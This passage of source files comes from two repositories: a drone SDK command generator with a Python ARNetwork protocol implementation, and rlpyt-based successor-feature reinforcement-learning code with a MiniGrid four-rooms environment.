ARSDK_ARG_TYPE_I8,\n') hfile.write(' ARSDK_ARG_TYPE_U16,\n') hfile.write(' ARSDK_ARG_TYPE_I16,\n') hfile.write(' ARSDK_ARG_TYPE_U32,\n') hfile.write(' ARSDK_ARG_TYPE_I32,\n') hfile.write(' ARSDK_ARG_TYPE_U64,\n') hfile.write(' ARSDK_ARG_TYPE_I64,\n') hfile.write(' ARSDK_ARG_TYPE_FLOAT,\n') hfile.write(' ARSDK_ARG_TYPE_DOUBLE,\n') hfile.write(' ARSDK_ARG_TYPE_STRING,\n') hfile.write('};\n') hfile.write ('\n') hfile.write ('struct arsdk_enum {\n') hfile.write (' const char *name;\n') hfile.write (' unsigned int value;\n') hfile.write (' const char *comment;\n') hfile.write ('};\n') hfile.write ('\n') hfile.write ('struct arsdk_arg {\n') hfile.write (' const char *name;\n') hfile.write (' enum arsdk_arg_type type;\n') hfile.write (' struct arsdk_enum *enums;\n') hfile.write (' unsigned int nenums;\n') hfile.write (' const char *comment;\n') hfile.write (' void *priv;\n') hfile.write ('};\n') hfile.write ('\n') hfile.write ('struct arsdk_cmd {\n') hfile.write (' const char *name;\n') hfile.write (' unsigned int id;\n') hfile.write (' struct arsdk_arg *args;\n') hfile.write (' unsigned int nargs;\n') hfile.write (' const char *comment;\n') hfile.write (' void *priv;\n') hfile.write ('};\n') hfile.write ('\n') hfile.write ('struct arsdk_class {\n') hfile.write (' const char *name;\n') hfile.write (' unsigned int ident;\n') hfile.write (' struct arsdk_cmd *cmds;\n') hfile.write (' unsigned int ncmds;\n') hfile.write (' const char *comment;\n') hfile.write (' void *priv;\n') hfile.write ('};\n') hfile.write ('\n') hfile.write ('struct arsdk_project {\n') hfile.write (' const char *name;\n') hfile.write (' eARCOMMANDS_ID_FEATURE ident;\n') hfile.write (' struct arsdk_class *classes;\n') hfile.write (' unsigned int nclasses;\n') hfile.write (' const char *comment;\n') hfile.write (' void *priv;\n') hfile.write ('};\n') hfile.write ('\n') # walk XML tree and dump C structures for ftr in allFeatures: defaultCls = ArClass('defaultCls', 0, '') for cmd in ftr.cmds + ftr.evts: cl = defaultCls if cmd.cls is None else cmd.cls for arg in cmd.args: hfile.write(dump_enum_table(ftr, cl, cmd, arg)) hfile.write(dump_arg_table(ftr, cl, cmd)) defaultCls.cmds = [cmd for cmd in (ftr.cmds + ftr.evts) if cmd.cls is None] if ftr.classes is None: ftr.classes = [] ftr.classes.append(defaultCls) for cl in ftr.classes: hfile.write(dump_cmd_table(ftr, cl)) hfile.write(dump_class_table(ftr)) hfile.write(dump_project_table(allFeatures)) hfile.write('#endif /* _ARSDK_ARCOMMANDS_TREE_H */\n') hfile.close() #=============================================================================== #=============================================================================== def native_list_files(ctx, outdir, paths): # print c generated files for f in paths.GENERATED_FILES: print os.path.join(outdir, f) #=============================================================================== #=============================================================================== def android_list_files(ctx, paths): # print java enum class files for ftr in ctx.features: for enum in ftr.enums: print paths.JNIJ_OUT_DIR + ARJavaEnumType(LIB_MODULE, get_ftr_old_name(ftr), enum.name) + '.java' for multiset in ftr.multisets: print paths.JNIJ_OUT_DIR + ARJavaMultiSetType(LIB_MODULE, get_ftr_old_name(ftr), multiset.name) + '.java' # print java listener class files for ftr in ctx.features: for cmd in ftr.cmds + ftr.evts: print paths.JNIJ_OUT_DIR + interfaceName(ftr, cmd) + '.java' # print java generated files for f in paths.GENERATED_JAVA_FILES: print os.path.join(outdir, f) # print java enum files generated from enums C print paths.JNIJ_OUT_DIR + ARJavaEnumType(LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '.java' print paths.JNIJ_OUT_DIR + ARJavaEnumType(LIB_MODULE, FIL_SUBMODULE, FIL_ERROR_ENAME) + '.java' print paths.JNIJ_OUT_DIR + ARJavaEnumType(LIB_MODULE, FIL_SUBMODULE, FIL_STATUS_ENAME) + '.java' print paths.JNIJ_OUT_DIR + ARJavaEnumType(LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + '.java' #=============================================================================== #=============================================================================== def jni_list_files(ctx, paths): # print c generated files for f in paths.GENERATED_JNI_FILES: print os.path.join(outdir, f) #=============================================================================== #=============================================================================== def list_files(ctx, outdir, extra): paths = Paths(outdir) if extra == "native": native_list_files(ctx, outdir, paths) elif extra == "android": android_list_files(ctx, paths) elif extra == "jni": jni_list_files(ctx, paths) #=============================================================================== #=============================================================================== def generate_files(ctx, outdir, extra): paths = Paths(outdir) if extra == "native": # Generation native_generateCmds(ctx, paths) PREBUILD_ACTION = PACKAGES_DIR+'/ARSDKBuildUtils/Utils/Python/ARSDK_PrebuildActions.py' os.system('python '+PREBUILD_ACTION+' --lib libARCommands --root '+LIBARCOMMANDS_DIR+' --outdir '+outdir + ' --disable-java') elif extra == "java": # Generation java_generateCmds(ctx, paths) elif extra == "jni": # Generation jni_generateCmds(ctx, paths) elif extra == "tree": dump_tree_header(ctx, './tree.h') #=============================================================================== #=============================================================================== #if __name__ == "__main__": # generateCmds() ``` #### File: PythonController/src/Bybop_Network.py ```python import Bybop_NetworkAL import struct import threading class NetworkStatus: OK = 0 ERROR = 1 TIMEOUT = 2 class Network(object): """ Simple implementation of the ARNetwork protocol. This implementation does not support intenal fifos. If multiple threads tries to send data on the same buffer at the same time, the actual send order is undefined. The 'send_data' call is blocking to allow simpler implementation, but is not doing busy waiting so it can be called from a thread without locking the GIL in python implementations that use one. This implementation use a listener to warn the application of newly received data. The listener should implement a 'data_received' function accepting the following arguments: - buf : The buffer on which this data was retrieved - recv_data : The actual data, as a packed string (use the struct module to unpack) And a 'did_disconnect' function, without arguments, which will be called if the product does not send any data on the network (probably because we lost the network link, or because the product has run out of battery) """ def __init__(self, ip, c2d_port, d2c_port, send_buffers, recv_buffers, listener): """ Create a new instance of ARNetwork. The instance will manage internally its ARNetworkAL backend. Arguments: - ip (string) : The device address - c2d_port : The remove reading port - d2c_port : The local reading port - send_buffers : List of buffers which should accept data from the application (i.e. which will be given to the send_data function) - recv_buffers : List of buffers which should accept incoming data """ self._netal = Bybop_NetworkAL.NetworkAL(ip, c2d_port, d2c_port, self) self._listener = listener self._send_buffers = list(send_buffers) # The application writed to these (send to network) self._recv_buffers = list(recv_buffers) # The application reads from these (read from network) self._send_seq = {} self._recv_seq = {} self._ack_events = {} self._ack_seq = {} self._buf_locks = {} self._ack_events_lock = threading.Lock() for sndb in self._send_buffers: self._send_seq[sndb] = 0 self._buf_locks[sndb] = threading.Lock() self._ack_events[sndb] = threading.Event() self._ack_seq[sndb] = 0 for rcvb in self._recv_buffers: self._recv_seq[rcvb] = 255 def stop(self): """ Stop the ARNetwork instance. This also stops the ARNetworkAL backend. This function has no effect on a stopped instance. """ self._netal.stop() def restart(self): """ Restart the ARNetwork instance. This also restarts the ARNetworkAL backend. This function has no effect on a started instance. """ self._netal.start() def _get_seq(self, buf): if not buf in self._send_seq: self._send_seq[buf] = 0 ret = self._send_seq[buf] self._send_seq[buf] += 1 self._send_seq[buf] %= 256 return ret def send_data(self, buf, data, type, timeout=0.15, tries=5): """ Send some data over the network, and return an ARNetworkStatus. The keyword arguments are only used for acknowledged data. For other data, the timeout is irrelevant, and only one try will be made. For acknowledged data, this function will block until either the acknowledge is received, or all the tries have been consumed in timeouts. For other data, this function returns almost immediately. Arguments: - buf : The target buffer for the data (must be part of the send_buffers list given to __init__) - data : The data to send - type : The type of the data (needs ack or not) Keyword arguments: - timeout : Timeout in floating point number of seconds, or None if no timeout (default 0.15) - tries : Total number of tries before considering a data as lost (default 5) """ if not buf in self._send_buffers: return NetworkStatus.ERROR seqnum = self._get_seq(buf) needack = type == Bybop_NetworkAL.DataType.DATA_WITH_ACK status = NetworkStatus.TIMEOUT with self._buf_locks[buf]: # If we need an ack, clear any pending ack event, and set the requested seqnum if needack: with self._ack_events_lock: self._ack_events[buf].clear() self._ack_seq[buf] = seqnum # Try 'retries' times in case of timeouts while tries > 0 and status == NetworkStatus.TIMEOUT: tries -= 1 status = NetworkStatus.OK if self._netal.send_data(type, buf, seqnum, data) else NetworkStatus.ERROR # We only set TIMEOUT status for acknowledged data if needack and status == NetworkStatus.OK: # Data with ack properly sent status = NetworkStatus.OK if self._ack_events[buf].wait(timeout) else NetworkStatus.TIMEOUT return status def _send_ack(self, buf, seq): answer = struct.pack('<B', seq) abuf = buf + 128 self._netal.send_data(Bybop_NetworkAL.DataType.ACK, abuf, self._get_seq(abuf), answer) def _send_pong(self, data): self._netal.send_data(Bybop_NetworkAL.DataType.DATA, 1, self._get_seq(1), data) def _should_accept(self, buf, seq): if not buf in self._recv_seq: return False prev = self._recv_seq[buf] diff = seq - prev ok = diff >= 0 or diff <= -10 if ok: self._recv_seq[buf] = seq return ok def data_received(self, type, buf, seq, recv_data): """ Implementation of the NetworkAL listener. This function should not be called direcly by application code ! """ if buf == 0: # This is a ping, send a pong ! self._send_pong(recv_data) if type == Bybop_NetworkAL.DataType.ACK: ackbuf = buf - 128 if ackbuf in self._send_buffers: seq = struct.unpack('<B', recv_data)[0] with self._ack_events_lock: if seq == self._ack_seq[ackbuf]: self._ack_events[ackbuf].set() elif type == Bybop_NetworkAL.DataType.DATA: self._process_data(buf, seq, recv_data) elif type == Bybop_NetworkAL.DataType.DATA_LOW_LATENCY: self._process_data(buf, seq, recv_data) elif type == Bybop_NetworkAL.DataType.DATA_WITH_ACK: self._process_data(buf, seq, recv_data) # And send ack ! self._send_ack(buf, seq) def _process_data(self, buf, seq, recv_data): if self._should_accept(buf, seq): self._listener.data_received(buf, recv_data) def did_disconnect(self): """ Implementation of the NetworkAL listener. This function should not be called directly by application code ! """ self._listener.did_disconnect() ```
{ "source": "2016choang/sfl", "score": 2 }
#### File: sfl/experiments/test_multiroom.py ```python import json import pickle import gym from gym_minigrid.wrappers import ReseedWrapper, RGBImgObsWrapper import numpy as np import torch from rlpyt.envs.gym import make as gym_make from rlpyt.models.dqn.dsr.grid_dsr_model import GridDsrModel from rlpyt.models.dqn.dsr.idf_model import IDFModel from rlpyt.utils.seed import set_seed ENV_ID = 'MiniGrid-FourRooms-v0' def visualize(config_file, checkpoint, output, cuda_idx=None): try: with open(config_file, 'r') as f: config = json.load(f) except ValueError: raise ValueError('Unable to read config file {}'.format(config_file)) mode = config['mode'] seed = config['seed'] set_seed(seed) if cuda_idx is not None: device = torch.device('cuda', index=cuda_idx) else: device = torch.device('cpu') # load in checkpoint into agent params = torch.load(checkpoint, map_location=device) # sample all possible agent positions within environment env = gym_make(id=ENV_ID, mode=mode, minigrid_config=config['env']) env.reset() SR = torch.zeros((env.grid.height, env.grid.width, 4, env.action_space.n, config['agent']['model_kwargs']['feature_size']), dtype=torch.float) SR += np.nan feature_model = IDFModel(env.observation_space.shape, env.action_space.n, **config['agent']['idf_model_kwargs']) feature_model.load_state_dict(params['agent_state_dict']['idf_model']) feature_model.to(device) model = GridDsrModel(env.observation_space.shape, env.action_space.n, **config['agent']['model_kwargs']) model.load_state_dict(params['agent_state_dict']['model']) model.to(device) for room in env.rooms: start_x, start_y = room.top size_x, size_y = room.size for direction in range(4): for x in range(start_x + 1, start_x + size_x - 1): for y in range(start_y + 1, start_y + size_y - 1): env.env.env.unwrapped.agent_pos = np.array([x, y]) env.env.env.unwrapped.agent_dir = direction obs, _, _, _ = env.env.env.step(5) obs = torch.Tensor(obs).unsqueeze(0) features = feature_model(obs.to(device), mode='encode') SR[x, y, direction] = model(features, mode='dsr') if room.exitDoorPos is not None: exit_door = np.array(room.exitDoorPos) env.env.env.unwrapped.agent_pos = exit_door env.env.env.unwrapped.agent_dir = direction obs, _, _, _ = env.env.env.step(5) obs = torch.Tensor(obs).unsqueeze(0) features = feature_model(obs.to(device), mode='encode') SR[exit_door[0], exit_door[1], direction] = model(features, mode='dsr') env.close() torch.save(SR, output) if __name__ == "__main__": import argparse parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('--config', help='config file') parser.add_argument('--checkpoint', help='checkpoint file') parser.add_argument('--output', help='output location') parser.add_argument('--cuda_idx', help='gpu to use ', type=int, default=0) args = parser.parse_args() visualize(config_file=args.config, checkpoint=args.checkpoint, output=args.output, cuda_idx=args.cuda_idx) ``` #### File: dqn/dsr/feature_dsr_agent.py ```python import numpy as np from sklearn.manifold import TSNE import torch from rlpyt.agents.base import AgentStep from rlpyt.agents.dqn.dsr.dsr_agent import DsrAgent, AgentInfo from rlpyt.agents.dqn.mixin import Mixin from rlpyt.models.dqn.dsr.idf_model import IDFModel from rlpyt.models.dqn.dsr.tcf_model import TCFModel from rlpyt.models.dqn.dsr.grid_dsr_model import GridDsrModel from rlpyt.models.utils import strip_ddp_state_dict from rlpyt.utils.buffer import buffer_to from rlpyt.utils.quick_args import save__init__args class FeatureDSRAgent(Mixin, DsrAgent): def __init__(self, feature_model_kwargs={}, initial_feature_model_state_dict=None, **kwargs): save__init__args(locals()) ModelCls = GridDsrModel super().__init__(ModelCls=ModelCls, **kwargs) self.featureModelCls = None def to_device(self, cuda_idx=None): super().to_device(cuda_idx) self.feature_model.to(self.device) def initialize(self, env_spaces, share_memory=False, global_B=1, env_ranks=None): super().initialize(env_spaces, share_memory, global_B=global_B, env_ranks=env_ranks) self.feature_model = self.featureModelCls(**self.env_model_kwargs, **self.feature_model_kwargs) if self.initial_feature_model_state_dict is not None: self.feature_model.load_state_dict(self.initial_feature_model_state_dict) def encode(self, observation): # Encode observation into feature representation model_inputs = buffer_to(observation, device=self.device) features = self.feature_model(model_inputs, mode='encode') return features.cpu() def state_dict(self): return dict(model=self.model.state_dict(), target=self.target_model.state_dict(), feature_model=self.feature_model.state_dict()) @torch.no_grad() def step(self, observation, prev_action, prev_reward): if self.distribution.epsilon >= 1.0: # Random policy action = torch.randint_like(prev_action, high=self.distribution.dim) else: # Epsilon-greedy over q-values generated with SF model_inputs = buffer_to(observation, device=self.device) features = self.feature_model(model_inputs, mode='encode') model_inputs = buffer_to(features, device=self.device) dsr = self.model(model_inputs, mode='dsr') model_inputs = buffer_to(dsr, device=self.device) q = self.model(model_inputs, mode='q') q = q.cpu() action = self.distribution.sample(q) agent_info = AgentInfo(a=action) return AgentStep(action=action, agent_info=agent_info) def dsr_parameters(self): return [param for name, param in self.model.named_parameters()] def feature_parameters(self): return [param for name, param in self.feature_model.named_parameters()] @torch.no_grad() def get_representations(self, env): # Get features and SFs of possible observations h, w = env.grid.height, env.grid.width features = torch.zeros((h, w, 4, self.feature_model.feature_size), dtype=torch.float) features += np.nan dsr = torch.zeros((h, w, 4, env.action_space.n, self.model.feature_size), dtype=torch.float) dsr += np.nan for pos in env.get_possible_pos(): x, y = pos for direction in range(4): env.unwrapped.agent_pos = np.array([x, y]) env.unwrapped.agent_dir = direction obs, _, _, _ = env.get_current_state() model_inputs = buffer_to(torch.Tensor(obs).unsqueeze(0), device=self.device) features[x, y, direction] = self.feature_model(model_inputs, mode='encode') model_inputs = buffer_to(features[x, y, direction], device=self.device) dsr[x, y, direction] = self.model(model_inputs, mode='dsr') return features, dsr @torch.no_grad() def get_representation_heatmap(self, representation, subgoal=(4, 13), mean_axes=(2, 3), distance='cos'): representation = representation.detach().numpy() representation_matrix = representation.mean(axis=mean_axes) representation_matrix = representation_matrix / np.linalg.norm(representation_matrix, ord=2, axis=2, keepdims=True) subgoal_representation = representation_matrix[subgoal] side_size = representation_matrix.shape[0] heatmap = np.zeros((side_size, side_size)) for x in range(side_size): for y in range(side_size): if distance == 'cos': heatmap[x, y] = np.dot(representation_matrix[x, y], subgoal_representation) elif distance == 'l2': heatmap[x, y] = np.linalg.norm(representation_matrix[x, y] - subgoal_representation, ord=2) else: raise NotImplementedError return heatmap @torch.no_grad() def get_q_values(self, env, dsr, subgoal=(4, 13), mean_axes=(2, )): dsr = dsr.detach().numpy() dsr_matrix = dsr.mean(axis=mean_axes) dsr_matrix = dsr_matrix / np.linalg.norm(dsr_matrix, ord=2, axis=3, keepdims=True) subgoal_dsr = dsr_matrix[subgoal].mean(axis=0) q_values = np.dot(dsr_matrix, subgoal_dsr) return q_values @torch.no_grad() def get_tsne(self, env, representation, mean_axes=(2, 3)): h, w = env.grid.height, env.grid.width representation = representation.detach().numpy() representation_matrix = np.nanmean(representation, axis=mean_axes) valid_representations = representation_matrix.reshape(h * w, -1) walls = np.isnan(valid_representations).any(axis=1) valid_representations = valid_representations[~walls] embeddings = TSNE(n_components=2).fit_transform(valid_representations) rooms = np.zeros((h, w)) if hasattr(env, 'rooms'): for i, room in enumerate(env.rooms, 1): start_x, start_y = room.top size_x, size_y = room.size for x in range(start_x + 1, start_x + size_x - 1): for y in range(start_y + 1, start_y + size_y - 1): rooms[x, y] = i rooms = rooms.reshape(h * w)[~walls] return embeddings, rooms def train_mode(self, itr): super().train_mode(itr) self.feature_model.train() def sample_mode(self, itr): super().sample_mode(itr) self.feature_model.eval() def eval_mode(self, itr): super().eval_mode(itr) self.feature_model.eval() class IDFDSRAgent: def __init__(self): self.featureModelCls = IDFModel def inverse_dynamics(self, observation, next_observation): model_inputs = buffer_to(observation, device=self.device) features = self.feature_model(model_inputs, mode='encode') model_inputs = buffer_to(next_observation, device=self.device) next_features = self.feature_model(model_inputs, mode='encode') model_inputs = buffer_to((features, next_features), device=self.device) pred_actions = self.feature_model(*model_inputs, mode='inverse') return pred_actions.cpu() class TCFDSRAgent: def __init__(self): self.featureModelCls = TCFModel ``` #### File: agents/dqn/mixin.py ```python class Mixin: def make_env_to_model_kwargs(self, env_spaces): return dict(image_shape=env_spaces.observation.shape, output_size=env_spaces.action.n) ``` #### File: dqn/dsr/action_dsr.py ```python from collections import namedtuple import torch import torch.nn as nn from rlpyt.algos.dqn.dsr.dsr import DSR from rlpyt.algos.utils import valid_from_done from rlpyt.utils.tensor import select_at_indexes, valid_mean OptInfo = namedtuple("OptInfo", ["dsrLoss", "dsrGradNorm", "tdAbsErr"]) class ActionDSR(DSR): """Action DSR.""" def __init__(self, **kwargs): super().__init__(**kwargs) def dsr_loss(self, samples): """Samples have leading batch dimension [B,..] (but not time).""" # 1a. encode observations in feature space with torch.no_grad(): features = self.agent.encode(samples.agent_inputs.observation) features = select_at_indexes(samples.action[:, 0], features) # 1b. estimate successor features given features s_features = self.agent(features) with torch.no_grad(): # 2a. encode target observations in feature space target_features = self.agent.encode(samples.target_inputs.observation) next_a = torch.randint(high=target_features.shape[1], size=samples.action[:, 0].shape) target_features = select_at_indexes(next_a, target_features) # 2b. estimate target successor features given features target_s_features = self.agent.target(target_features) # 3. combine current features + discounted target successor features disc_target_s_features = (self.discount ** self.n_step_return) * target_s_features y = features + (1 - samples.done_n.float()).view(-1, 1) * disc_target_s_features delta = y - s_features losses = 0.5 * delta ** 2 abs_delta = abs(delta) if self.delta_clip is not None: # Huber loss. b = self.delta_clip * (abs_delta - self.delta_clip / 2) losses = torch.where(abs_delta <= self.delta_clip, losses, b) # if self.prioritized_replay: # losses *= samples.is_weights # sum losses over feature vector such that each sample has a scalar loss (result: B x 1) # losses = losses.sum(dim=1) td_abs_errors = abs_delta.detach() if self.delta_clip is not None: td_abs_errors = torch.clamp(td_abs_errors, 0, self.delta_clip) if not self.mid_batch_reset: valid = valid_from_done(samples.done) loss = valid_mean(losses, valid) td_abs_errors *= valid else: loss = torch.mean(losses) return loss, td_abs_errors ``` #### File: dqn/dsr/feature_dsr.py ```python from collections import namedtuple import torch import torch.nn as nn from rlpyt.algos.dqn.dsr.dsr import DSR from rlpyt.replays.non_sequence.uniform import (UniformReplayBuffer, AsyncUniformReplayBuffer, LandmarkUniformReplayBuffer, UniformTripletReplayBuffer) from rlpyt.utils.collections import namedarraytuple from rlpyt.utils.logging import logger from rlpyt.utils.misc import param_norm_ from rlpyt.utils.quick_args import save__init__args from rlpyt.utils.tensor import select_at_indexes, valid_mean from rlpyt.algos.utils import valid_from_done FeatureOptInfo = namedtuple("FeateureOptInfo", ["featureLoss", "featureGradNorm", "dsrLoss", "dsrGradNorm", "tdAbsErr"]) class FeatureDSR(DSR): """Feature-based DSR.""" def __init__( self, feature_learning_rate=2.5e4, max_steps_feature_learn=None, min_steps_dsr_learn=int(5e4), **kwargs): super().__init__(**kwargs) save__init__args(locals()) def initialize(self, agent, n_itr, batch_spec, mid_batch_reset, examples, world_size=1, rank=0): super().initialize(agent, n_itr, batch_spec, mid_batch_reset, examples, world_size, rank) if self.max_steps_feature_learn is not None: self.max_itr_feature_learn = int(self.max_steps_feature_learn // self.sampler_bs) else: self.max_itr_feature_learn = None self.min_itr_dsr_learn = int(self.min_steps_dsr_learn // self.sampler_bs) def optim_initialize(self, rank=0): """Called by async runner.""" self.rank = rank self.dsr_optimizer = self.OptimCls(self.agent.dsr_parameters(), lr=self.learning_rate, **self.optim_kwargs) self.feature_optimizer = self.OptimCls(self.agent.feature_parameters(), lr=self.feature_learning_rate, **self.optim_kwargs) if self.initial_optim_state_dict is not None: self.dsr_optimizer.load_state_dict(self.initial_optim_state_dict['dsr']) self.feature_optimizer.load_state_dict(self.initial_optim_state_dict['feature']) # if self.prioritized_replay: # self.pri_beta_itr = max(1, self.pri_beta_steps // self.sampler_bs) def initialize_replay_buffer(self, examples, batch_spec, async_=False): super().initialize_replay_buffer(examples, batch_spec, async_) self.feature_replay_buffer = None def optim_state_dict(self): """If carrying multiple optimizers, overwrite to return dict state_dicts.""" return {'dsr': self.dsr_optimizer.state_dict(), 'feature': self.feature_optimizer.state_dict()} def append_feature_samples(self, samples=None): # Append samples to replay buffer used for training feature representation only if samples is not None and self.feature_replay_buffer is not None: samples_to_buffer = self.samples_to_buffer(samples) self.feature_replay_buffer.append_samples(samples_to_buffer) def append_dsr_samples(self, samples=None): # Append samples to replay buffer used for training successor features if samples is not None: samples_to_buffer = self.samples_to_buffer(samples) self.replay_buffer.append_samples(samples_to_buffer) def optimize_agent(self, itr, sampler_itr=None): itr = itr if sampler_itr is None else sampler_itr # Async uses sampler_itr. opt_info = self.opt_info_class(*([] for _ in range(len(self.opt_info_class._fields)))) if itr < self.min_itr_learn: # Not enough samples have been collected return opt_info for _ in range(self.updates_per_optimize): samples_from_replay = self.replay_buffer.sample_batch(self.batch_size) if self.max_itr_feature_learn is None or itr < self.max_itr_feature_learn: # Train feature representation if self.feature_replay_buffer: feature_samples_from_replay = self.feature_replay_buffer.sample_batch(self.batch_size) else: feature_samples_from_replay = samples_from_replay self.feature_optimizer.zero_grad() feature_loss, feature_opt_info = self.feature_loss(feature_samples_from_replay) feature_loss.backward() feature_grad_norm = torch.nn.utils.clip_grad_norm_( self.agent.feature_parameters(), self.clip_grad_norm) self.feature_optimizer.step() opt_info.featureLoss.append(feature_loss.item()) opt_info.featureGradNorm.append(feature_grad_norm) for key, value in feature_opt_info.items(): getattr(opt_info, key).append(value) if itr >= self.min_itr_dsr_learn: # Train successor feature representation self.dsr_optimizer.zero_grad() dsr_loss, td_abs_errors = self.dsr_loss(samples_from_replay) dsr_loss.backward() dsr_grad_norm = torch.nn.utils.clip_grad_norm_( self.agent.dsr_parameters(), self.clip_grad_norm) self.dsr_optimizer.step() opt_info.dsrLoss.append(dsr_loss.item()) opt_info.dsrGradNorm.append(dsr_grad_norm) opt_info.tdAbsErr.extend(td_abs_errors[::8].numpy()) # Downsample. self.update_counter += 1 if self.update_counter % self.target_update_interval == 0: self.agent.update_target() self.update_itr_hyperparams(itr) return opt_info def feature_loss(self, samples_from_replay): raise NotImplementedError IDFOptInfo = namedtuple("IDFOptInfo", ["idfAccuracy"] + list(FeatureOptInfo._fields)) class IDFDSR(FeatureDSR): """Inverse Dynamics Features DSR.""" def __init__(self, **kwargs): super().__init__(**kwargs) self.opt_info_class = IDFOptInfo self.opt_info_fields = tuple(f for f in self.opt_info_class._fields) self.cross_entropy_loss = nn.CrossEntropyLoss() def feature_loss(self, samples): # Inverse dynamics prediction loss pred_actions = self.agent.inverse_dynamics(samples.agent_inputs.observation, samples.target_inputs.observation) loss = self.cross_entropy_loss(pred_actions, samples.action) with torch.no_grad(): accuracy = ((pred_actions.argmax(dim=1) == samples.action).sum().float() / samples.action.shape[0]) * 100 feature_opt_info = {'idfAccuracy': accuracy.item()} return loss, feature_opt_info TCFOptInfo = namedtuple("TCFOptInfo", ["posDistance", "negDistance"] + list(FeatureOptInfo._fields)) SamplesToBuffer = namedarraytuple("SamplesToBuffer", ["observation", "action", "reward", "done", "mode"]) class LandmarkTCFDSR(FeatureDSR): """Time Contrastive Features DSR.""" def __init__( self, pos_threshold=3, neg_close_threshold=15, neg_far_threshold=30, margin=2.0, **kwargs): save__init__args(locals()) super().__init__(**kwargs) self.opt_info_class = TCFOptInfo self.opt_info_fields = tuple(f for f in self.opt_info_class._fields) def initialize(self, agent, n_itr, batch_spec, mid_batch_reset, examples, world_size=1, rank=0): super().initialize(agent, n_itr, batch_spec, mid_batch_reset, examples, world_size, rank) self.initialize_triplet_replay_buffer(examples, batch_spec) def initialize_replay_buffer(self, examples, batch_spec, async_=False): example_to_buffer = SamplesToBuffer( observation=examples["observation"], action=examples["action"], reward=examples["reward"], done=examples["done"], mode=examples["agent_info"].mode, ) replay_kwargs = dict( example=example_to_buffer, size=self.replay_size, B=batch_spec.B, discount=self.discount, n_step_return=self.n_step_return, ) # if self.prioritized_replay: # replay_kwargs.update(dict( # alpha=self.pri_alpha, # beta=self.pri_beta_init, # default_priority=self.default_priority, # )) # ReplayCls = (AsyncPrioritizedReplayFrameBuffer if async_ else # PrioritizedReplayFrameBuffer) # else: # ReplayCls = (AsyncUniformReplayFrameBuffer if async_ else # UniformReplayFrameBuffer) ReplayCls = (AsyncUniformReplayBuffer if async_ else LandmarkUniformReplayBuffer) self.replay_buffer = ReplayCls(**replay_kwargs) self.feature_replay_buffer = None def initialize_triplet_replay_buffer(self, examples, batch_spec, async_=False): example_to_buffer = SamplesToBuffer( observation=examples["observation"], action=examples["action"], reward=examples["reward"], done=examples["done"], mode=examples["agent_info"].mode, ) triplet_replay_kwargs = dict( example=example_to_buffer, size=self.replay_size, B=batch_spec.B, pos_threshold=self.pos_threshold, neg_close_threshold=self.neg_close_threshold, neg_far_threshold=self.neg_far_threshold ) self.feature_replay_buffer = UniformTripletReplayBuffer(**triplet_replay_kwargs) def samples_to_buffer(self, samples): return SamplesToBuffer( observation=samples.env.observation, action=samples.agent.action, reward=samples.env.reward, done=samples.env.done, mode=samples.agent.agent_info.mode ) def feature_loss(self, samples): # Time contrastive loss anchor_embeddings = self.agent.encode(samples.anchor) pos_embeddings = self.agent.encode(samples.pos) neg_embeddings = self.agent.encode(samples.neg) pos_dist = torch.norm(anchor_embeddings - pos_embeddings, p=2, dim=1) neg_dist = torch.norm(anchor_embeddings - neg_embeddings, p=2, dim=1) loss = torch.clamp(self.margin + pos_dist - neg_dist, min=0.0).mean() with torch.no_grad(): feature_opt_info = {"posDistance": pos_dist.mean().item(), "negDistance": neg_dist.mean().item()} return loss, feature_opt_info def dsr_loss(self, samples): """Samples have leading batch dimension [B,..] (but not time).""" # 1a. encode observations in feature space with torch.no_grad(): features = self.agent.encode(samples.agent_inputs.observation) # 1b. estimate successor features given features dsr = self.agent(features) s_features = select_at_indexes(samples.action, dsr) with torch.no_grad(): # 2a. encode target observations in feature space target_features = self.agent.encode(samples.target_inputs.observation) # 2b. estimate target successor features given features target_dsr = self.agent.target(target_features) # next_qs = self.agent.q_estimate(target_dsr) # next_a = torch.argmax(next_qs, dim=-1) # random actions next_a = torch.randint(high=target_dsr.shape[1], size=samples.action.shape) target_s_features = select_at_indexes(next_a, target_dsr) # 3. combine current features + discounted target successor features done_n = samples.done_n.float().view(-1, 1) disc_target_s_features = (self.discount ** self.n_step_return) * target_s_features s_y = target_features + (1 - samples.target_done.float()).view(-1, 1) * disc_target_s_features y = features * done_n + (1 - done_n) * s_y delta = y - s_features losses = 0.5 * delta ** 2 abs_delta = abs(delta) if self.delta_clip is not None: # Huber loss. b = self.delta_clip * (abs_delta - self.delta_clip / 2) losses = torch.where(abs_delta <= self.delta_clip, losses, b) # if self.prioritized_replay: # losses *= samples.is_weights # sum losses over feature vector such that each sample has a scalar loss (result: B x 1) # losses = losses.sum(dim=1) td_abs_errors = abs_delta.mean(axis=1).detach() if self.delta_clip is not None: td_abs_errors = torch.clamp(td_abs_errors, 0, self.delta_clip) if not self.mid_batch_reset: losses = torch.mean(losses, axis=1) valid = valid_from_done(samples.done) loss = valid_mean(losses, valid) td_abs_errors *= valid else: loss = torch.mean(losses) return loss, td_abs_errors ``` #### File: rlpyt/envs/minigrid.py ```python from gym_minigrid.minigrid import * class FourRooms(MiniGridEnv): """ Classic 4 rooms gridworld environment. Can specify agent and goal position, if not it set at random. """ def __init__(self, start_pos=None, goal_pos=None, max_steps=100): self._agent_default_pos = start_pos self._goal_default_pos = goal_pos self.start_pos = start_pos self.goal_pos = goal_pos super().__init__(grid_size=13, max_steps=max_steps) def _gen_grid(self, width, height): # Create the grid self.grid = Grid(width, height) # Generate the surrounding walls self.grid.horz_wall(0, 0) self.grid.horz_wall(0, height - 1) self.grid.vert_wall(0, 0) self.grid.vert_wall(width - 1, 0) room_w = width // 2 room_h = height // 2 # For each row of rooms for j in range(0, 2): # For each column for i in range(0, 2): xL = i * room_w yT = j * room_h xR = xL + room_w yB = yT + room_h # Bottom wall and door if i + 1 < 2: self.grid.vert_wall(xR, yT, room_h) # pos = (xR, self._rand_int(yT + 1, yB)) # self.grid.set(*pos, None) # Bottom wall and door if j + 1 < 2: if i == 1: yB += 1 self.grid.horz_wall(xL, yB, room_w) # pos = (self._rand_int(xL + 1, xR), yB) # self.grid.set(*pos, None) for pos in [(6, 3), (2, 6), (9, 7), (6, 10)]: self.grid.set(*pos, None) # Randomize the player start position and orientation if self._agent_default_pos is not None: self.agent_pos = self._agent_default_pos self.grid.set(*self._agent_default_pos, None) 